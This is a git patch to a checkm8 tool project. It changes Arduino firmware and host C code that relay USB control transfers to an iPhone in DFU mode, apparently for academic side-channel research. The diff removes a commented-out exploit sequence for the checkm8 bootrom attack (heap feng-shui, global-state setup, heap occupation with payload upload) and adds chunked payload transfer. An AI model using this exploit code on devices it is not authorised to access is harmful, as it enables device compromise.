From 578699bbc302662a9b4fc53df69cf889287fdca2 Mon Sep 17 00:00:00 2001 From: Gregor Haas Date: Mon, 30 Dec 2019 17:43:25 -0500 Subject: [PATCH] It works!!! --- checkm8_arduino/CMakeLists.txt | 4 +- checkm8_arduino/src/checkm8_arduino.ino | 286 ++++++------------------ checkm8_remote/bin/payloads | 1 - checkm8_remote/include/usb_helpers.h | 4 - checkm8_remote/src/usb_helpers.c | 61 +++-- include/ard_protocol.h | 2 + include/checkm8_config.h | 2 +- 7 files changed, 113 insertions(+), 247 deletions(-) delete mode 120000 checkm8_remote/bin/payloads diff --git a/checkm8_arduino/CMakeLists.txt b/checkm8_arduino/CMakeLists.txt index 0059cee..78c2f7d 100644 --- a/checkm8_arduino/CMakeLists.txt +++ b/checkm8_arduino/CMakeLists.txt @@ -1,5 +1,5 @@ cmake_minimum_required(VERSION 3.10) -set(CMAKE_TOOLCHAIN_FILE ${CMAKE_SOURCE_DIR}/cmake/ArduinoToolchain.cmake) +set(CMAKE_TOOLCHAIN_FILE cmake/ArduinoToolchain.cmake) set(CMAKE_CXX_STANDARD 98) project(checkm8_arduino) @@ -10,7 +10,7 @@ generate_arduino_library(checkm8_arduino_libhostshield) set(checkm8_arduino_BOARD uno) set(checkm8_arduino_HDRS include/User_Setup.h include/Usb.h) set(checkm8_arduino_LIBS checkm8_arduino_libhostshield) -set(checkm8_arduino_SKETCH ${CMAKE_CURRENT_SOURCE_DIR}/src/checkm8_arduino.ino) +set(checkm8_arduino_SKETCH src/checkm8_arduino.ino) set(checkm8_arduino_PROGRAMMER avrispmkii) set(checkm8_arduino_PORT /dev/ttyACM0) diff --git a/checkm8_arduino/src/checkm8_arduino.ino b/checkm8_arduino/src/checkm8_arduino.ino index 6d797c4..1793ebb 100644 --- a/checkm8_arduino/src/checkm8_arduino.ino +++ b/checkm8_arduino/src/checkm8_arduino.ino @@ -1,127 +1,20 @@ -#include "User_Setup.h" -#include "Usb.h" +#include "../include/User_Setup.h" +#include "../include/Usb.h" #include "checkm8_config.h" #include "ard_protocol.h" -#include USB Usb; USB_DEVICE_DESCRIPTOR desc_buf; uint8_t state, rcode, addr = 1; - -//uint8_t io_buf[0x100]; -// -//EpInfo *pep = NULL; -//uint16_t nak_limit = 0; -//uint8_t pktsize; -//uint16_t sz; -//const uint8_t *p; -//uint16_t part_sz; +uint8_t usb_data_buf[ARD_BUF_SIZE]; struct serial_desc_args sd_args; -uint16_t serial_desc_buf[256]; - struct usb_xfer_args usb_args; -uint8_t usb_data_buf[512]; -int i; +int i, chunk_i; +int size, chunk_size; char cmd; -//enum -//{ -// CHECKM8_INIT_RESET, -// CHECKM8_HEAP_FENG_SHUI, -// CHECKM8_SET_GLOBAL_STATE, -// CHECKM8_HEAP_OCCUPATION, -// CHECKM8_END -//}; -//uint8_t checkm8_state = CHECKM8_INIT_RESET; -// -// -//void heap_feng_shui_req(uint8_t sz) -//{ -// rcode = Usb.ctrlReq_SETUP(addr, 0, 0x80, 6, 4, 3, 0x40a, sz); -// Usb.regWr(rHCTL, bmRCVTOG1); -// rcode = Usb.dispatchPkt(tokIN, 0, 0); -//} -// -//void heap_feng_shui() -//{ -// Serial.println("1. heap feng-shui"); -// heap_feng_shui_req(0xc0); -// heap_feng_shui_req(0xc0); -// for(int i = 0; i < 6; i++) -// heap_feng_shui_req(0xc1); -//} -// -//void set_global_state() -//{ -// Serial.println("2. set global state"); -// rcode = Usb.ctrlReq_SETUP(addr, 0, 0x21, 1, 0, 0, 0, 0x800); -// rcode = Usb.dispatchPkt(tokOUTHS, 0, 0); -// rcode = Usb.ctrlReq(addr, 0, 0x21, 4, 0, 0, 0, 0, 0, NULL, NULL); -//} -// -//void heap_occupation() -//{ -// Serial.println("3. heap occupation"); -// -// heap_feng_shui_req(0xc1); -// heap_feng_shui_req(0xc1); -// heap_feng_shui_req(0xc1); -// -// sz = sizeof(overwrite); -// p = overwrite; -// rcode = Usb.ctrlReq_SETUP(addr, 0, 0, 9, 0, 0, 0, sz); -// Usb.regWr(rHCTL, bmSNDTOG0); -// send_out(io_buf, 0); -// while(sz) -// { -// pktsize = min(sz, 0x40); -// for(int i = 0; i < pktsize; i++) -// io_buf[i] = pgm_read_byte(&p[i]); -// send_out(io_buf, pktsize); -// if(rcode) -// { -// Serial.println("sending error"); -// checkm8_state = CHECKM8_END; -// return; -// } -// sz -= pktsize; -// p += pktsize; -// } -// -// sz = sizeof(payload); -// p = payload; -// -// while(sz) -// { -// part_sz = min(0x7ff, sz); -// sz -= part_sz; -// rcode = Usb.ctrlReq_SETUP(addr, 0, 0x21, 1, 0, 0, 0, part_sz); -// Usb.regWr(rHCTL, bmSNDTOG0); -// send_out(io_buf, 0); -// while(part_sz) -// { -// pktsize = min(part_sz, 0x40); -// for(int i = 0; i < pktsize; i++) -// io_buf[i] = pgm_read_byte(&p[i]); -// send_out(io_buf, pktsize); -// if(rcode) -// { -// Serial.println("sending error"); -// checkm8_state = CHECKM8_END; -// return; -// } -// part_sz -= pktsize; -// p += pktsize; -// } -// Serial.print("Payload loading... "); -// Serial.print(sizeof(payload) - sz); -// Serial.print("/"); -// Serial.println(sizeof(payload)); -// } -//} - void recv_args(uint8_t *target, int len) { for(i = 0; i < len; i = i + 1) @@ -133,6 +26,17 @@ void recv_args(uint8_t *target, int len) } } +uint8_t respond_rcode() +{ + if(rcode) + { + Serial.write(PROT_FAIL_USB); + Serial.write(rcode); + return 1; + } + else return 0; +} + uint8_t send_data(uint8_t *buf, uint8_t len) { Usb.bytesWr(rSNDFIFO, len, buf); @@ -177,22 +81,16 @@ void loop() (usb_args.wValue >> 8u) & 0xFFu, usb_args.wIndex, usb_args.data_len); - if(rcode) - { - Serial.write(PROT_FAIL_USB); - Serial.write(rcode); - break; - } + if(respond_rcode()) break; - Usb.regWr(rHCTL, bmRCVTOG1); - rcode = Usb.dispatchPkt(tokIN, 0, 0); - if(rcode) + if(usb_args.bmRequestType & 0x80u) { - Serial.write(PROT_FAIL_USB); - Serial.write(rcode); - break; + Usb.regWr(rHCTL, bmRCVTOG1); + rcode = Usb.dispatchPkt(tokIN, 0, 0); } + else rcode = Usb.dispatchPkt(tokOUTHS, 0, 0); + if(respond_rcode()) break; Serial.write(PROT_SUCCESS); break; @@ -207,21 +105,21 @@ void loop() (usb_args.wValue >> 8u) & 0xFFu, usb_args.wIndex, usb_args.data_len); - rcode = Usb.dispatchPkt(tokOUTHS, 0, 0); + respond_rcode(); + + if(usb_args.bmRequestType & 0x80u) + { + Usb.regWr(rHCTL, bmRCVTOG1); + rcode = Usb.dispatchPkt(tokIN, 0, 0); + } + else rcode = Usb.dispatchPkt(tokOUTHS, 0, 0); + + respond_rcode(); Serial.write(PROT_SUCCESS); break; case PROT_NO_ERROR_CTRL_XFER_DATA: recv_args((uint8_t *) &usb_args, sizeof(struct usb_xfer_args)); - if(usb_args.data_len > sizeof(usb_data_buf)) - { - recv_args(NULL, usb_args.data_len); - Serial.write(PROT_ACK); - Serial.write(PROT_FAIL_TOOBIG); - break; - } - - recv_args(usb_data_buf, usb_args.data_len); Serial.write(PROT_ACK); rcode = Usb.ctrlReq_SETUP(addr, 0, @@ -231,48 +129,56 @@ void loop() (usb_args.wValue >> 8u) & 0xFFu, usb_args.wIndex, usb_args.data_len); + respond_rcode(); Usb.regWr(rHCTL, bmSNDTOG0); - send_data(usb_data_buf, 0); - send_data(usb_data_buf, usb_args.data_len); - Serial.write(PROT_SUCCESS); - break; + rcode = send_data(usb_data_buf, 0); + respond_rcode(); - case PROT_CTRL_XFER: - recv_args((uint8_t *) &usb_args, sizeof(struct usb_xfer_args)); - if(usb_args.data_len > sizeof(usb_data_buf)) + chunk_i = 0; + while(chunk_i < usb_args.data_len) { - // need to waste the data sent on the serial bus since the - // remote sends args and data consecutively and only checks - // for errors after receiving an ACK + if(usb_args.data_len - chunk_i > ARD_BUF_SIZE) chunk_size = ARD_BUF_SIZE; + else chunk_size = usb_args.data_len - chunk_i; - recv_args(NULL, usb_args.data_len); + recv_args(usb_data_buf, chunk_size); Serial.write(PROT_ACK); - Serial.write(PROT_FAIL_TOOBIG); - break; - } - recv_args(usb_data_buf, usb_args.data_len); - Serial.write(PROT_ACK); + // i is the current data index + i = 0; + while(i < chunk_size) + { + if(chunk_size - i > 64) size = 64; + else size = chunk_size - i; - rcode = Usb.ctrlReq(addr, 0, - usb_args.bmRequestType, - usb_args.bRequest, - usb_args.wValue & 0xFFu, - (usb_args.wValue >> 8u) & 0xFFu, - usb_args.wIndex, - usb_args.data_len, usb_args.data_len, - usb_data_buf, NULL); - if(rcode) - { - Serial.write(PROT_FAIL_USB); - Serial.write(rcode); - break; + rcode = send_data(&usb_data_buf[i], size); + respond_rcode(); + i += size; + } + + chunk_i += chunk_size; } Serial.write(PROT_SUCCESS); break; +// case PROT_CTRL_XFER: +// recv_args((uint8_t *) &usb_args, sizeof(struct usb_xfer_args)); +// if(receive_data_and_respond()) break; +// +// rcode = Usb.ctrlReq(addr, 0, +// usb_args.bmRequestType, +// usb_args.bRequest, +// usb_args.wValue & 0xFFu, +// (usb_args.wValue >> 8u) & 0xFFu, +// usb_args.wIndex, +// usb_args.data_len, usb_args.data_len, +// usb_data_buf, NULL); +// if(respond_rcode()) break; +// +// Serial.write(PROT_SUCCESS); +// break; + case PROT_RESET: Serial.write(PROT_ACK); @@ -302,13 +208,13 @@ void loop() } // multiplication by 2 is necessary here because iphone returns 16-bit characters - Usb.getStrDescr(addr, 0, sd_args.len * 2, desc_buf.iSerialNumber, 0x0409, (uint8_t *) serial_desc_buf); + Usb.getStrDescr(addr, 0, sd_args.len * 2, desc_buf.iSerialNumber, 0x0409, usb_data_buf); Serial.write(PROT_SUCCESS); // not sure what the first byte is; skip it for(i = 1; i < sd_args.len + 1; i++) { - Serial.write(serial_desc_buf[i]); + Serial.write(((uint16_t *) usb_data_buf)[i]); } break; @@ -316,55 +222,5 @@ void loop() // Serial.write(PROT_FAIL_BADCMD); // break; } - - -// Usb.getDevDescr(addr, 0, 0x12, (uint8_t * ) & desc_buf); -// if(desc_buf.idVendor != 0x5ac || desc_buf.idProduct != 0x1227) -// { -// Usb.setUsbTaskState(USB_ATTACHED_SUBSTATE_RESET_DEVICE); -// if(checkm8_state != CHECKM8_END) -// { -// Serial.print("Non Apple DFU found (vendorId: "); -// Serial.print(desc_buf.idVendor); -// Serial.print(", productId: "); -// Serial.print(desc_buf.idProduct); -// Serial.println(")"); -// delay(5000); -// } -// return; -// } -// switch(checkm8_state) -// { -// case CHECKM8_INIT_RESET: -// for(int i = 0; i < 3; i++) -// { -// digitalWrite(6, HIGH); -// delay(500); -// digitalWrite(6, LOW); -// delay(500); -// } -// checkm8_state = CHECKM8_HEAP_FENG_SHUI; -// Usb.setUsbTaskState(USB_ATTACHED_SUBSTATE_RESET_DEVICE); -// break; -// case CHECKM8_HEAP_FENG_SHUI: -// heap_feng_shui(); -// checkm8_state = CHECKM8_SET_GLOBAL_STATE; -// Usb.setUsbTaskState(USB_ATTACHED_SUBSTATE_RESET_DEVICE); -// break; -// case CHECKM8_SET_GLOBAL_STATE: -// set_global_state(); -// checkm8_state = CHECKM8_HEAP_OCCUPATION; -// while(Usb.getUsbTaskState() != USB_DETACHED_SUBSTATE_WAIT_FOR_DEVICE) -// { Usb.Task(); } -// break; -// case CHECKM8_HEAP_OCCUPATION: -// heap_occupation(); -// checkm8_state = CHECKM8_END; -// Usb.setUsbTaskState(USB_ATTACHED_SUBSTATE_RESET_DEVICE); -// break; -// case CHECKM8_END: -// digitalWrite(6, HIGH); -// break; -// } } } \ No newline at end of file diff --git a/checkm8_remote/bin/payloads b/checkm8_remote/bin/payloads deleted file mode 120000 index 4c48285..0000000 --- a/checkm8_remote/bin/payloads +++ /dev/null @@ -1 +0,0 @@ -/home/grg/Projects/School/NCSU/iphone_aes_sc/checkm8_tool/checkm8_remote/checkm8_payloads/bin \ No newline at end of file diff --git a/checkm8_remote/include/usb_helpers.h b/checkm8_remote/include/usb_helpers.h index cee8795..81c4f62 100644 --- a/checkm8_remote/include/usb_helpers.h +++ b/checkm8_remote/include/usb_helpers.h @@ -3,11 +3,7 @@ #include "checkm8.h" -#ifdef WITH_ARDUINO -#define MAX_PACKET_SIZE 512 -#else #define MAX_PACKET_SIZE 0x800 -#endif #ifndef WITH_ARDUINO #include "libusb.h" diff --git a/checkm8_remote/src/usb_helpers.c b/checkm8_remote/src/usb_helpers.c index 9fe4e2d..b5c36b5 100644 --- a/checkm8_remote/src/usb_helpers.c +++ b/checkm8_remote/src/usb_helpers.c @@ -367,18 +367,19 @@ int no_error_ctrl_transfer(struct pwned_device *dev, if(buf == PROT_ACK) { checkm8_debug_indent("\treceived ack\n"); + do + { + if(buf == PROT_FAIL_USB) + { + while(read(dev->ard_fd, &buf, 1) == 0); + checkm8_debug_indent("\treceived error %X but ignoring\n", buf); + } - while(read(dev->ard_fd, &buf, 1) == 0); - if(buf == PROT_SUCCESS) - { - checkm8_debug_indent("\tsuccess\n"); - return CHECKM8_SUCCESS; - } - else - { - checkm8_debug_indent("\tunexpected response %X\n", buf); - return CHECKM8_FAIL_PROT; - } + while(read(dev->ard_fd, &buf, 1) == 0); + } while(buf != PROT_SUCCESS); + + checkm8_debug_indent("\tsuccess\n"); + return CHECKM8_SUCCESS; } else { @@ -416,6 +417,7 @@ int no_error_ctrl_transfer_data(struct pwned_device *dev, "no_error_ctrl_transfer_data(dev = %p, bmRequestType = %i, bRequest = %i, wValue = %i, wIndex = %i, data = %p, data_len = %i, timeout = %i)\n", dev, bmRequestType, bRequest, wValue, wIndex, data, data_len, timeout); #ifdef WITH_ARDUINO + int amount, index = 0; char buf; struct usb_xfer_args args; args.bmRequestType = bmRequestType; @@ -427,29 +429,40 @@ int no_error_ctrl_transfer_data(struct pwned_device *dev, checkm8_debug_indent("\tsending data to arduino\n"); write(dev->ard_fd, &PROT_NO_ERROR_CTRL_XFER_DATA, 1); write(dev->ard_fd, &args, sizeof(struct usb_xfer_args)); - write(dev->ard_fd, data, data_len); while(read(dev->ard_fd, &buf, 1) == 0); if(buf == PROT_ACK) { - checkm8_debug_indent("\treceived ack\n"); + checkm8_debug_indent("\treceived argument ack\n"); + + while(index < data_len) + { + if(data_len - index > ARD_BUF_SIZE) amount = ARD_BUF_SIZE; + else amount = data_len - index; + + checkm8_debug_indent("\twriting data chunk of size %i\n", amount); + write(dev->ard_fd, &data[index], amount); + do + { + if(buf == PROT_FAIL_USB) + { + while(read(dev->ard_fd, &buf, 1) == 0); + checkm8_debug_indent("\treceived error %X but ignoring\n", buf); + } + + while(read(dev->ard_fd, &buf, 1) == 0); + } while(buf != PROT_ACK); + + checkm8_debug_indent("\treceived data ack\n"); + index += amount; + } while(read(dev->ard_fd, &buf, 1) == 0); - if(buf == PROT_FAIL_TOOBIG) - { - checkm8_debug_indent("\tdata packet is too big\n"); - return CHECKM8_FAIL_INVARGS; - } - else if(buf == PROT_SUCCESS) + if(buf == PROT_SUCCESS) { checkm8_debug_indent("\tsuccess\n"); return CHECKM8_SUCCESS; } - else - { - checkm8_debug_indent("\tunexpected response %X\n", buf); - return CHECKM8_FAIL_PROT; - } } else { diff --git a/include/ard_protocol.h b/include/ard_protocol.h index f4f3258..e3d0dc9 100644 --- a/include/ard_protocol.h +++ b/include/ard_protocol.h @@ -1,6 +1,8 @@ #ifndef CHECKM8_TOOL_ARD_PROTOCOL_H #define CHECKM8_TOOL_ARD_PROTOCOL_H +#define ARD_BUF_SIZE 512 + static const char PROT_PARTIAL_CTRL_XFER = 'P'; static const char PROT_NO_ERROR_CTRL_XFER = 'N'; static const char PROT_NO_ERROR_CTRL_XFER_DATA = 'M'; diff --git a/include/checkm8_config.h b/include/checkm8_config.h index 1cb13ca..7546d0b 100644 --- a/include/checkm8_config.h +++ b/include/checkm8_config.h @@ -4,7 +4,7 @@ //#define LIBUSB_LOGGING #define CHECKM8_LOGGING -//#define WITH_ARDUINO +#define WITH_ARDUINO #define ARDUINO_DEV "/dev/ttyACM0" #define ARDUINO_BAUD 115200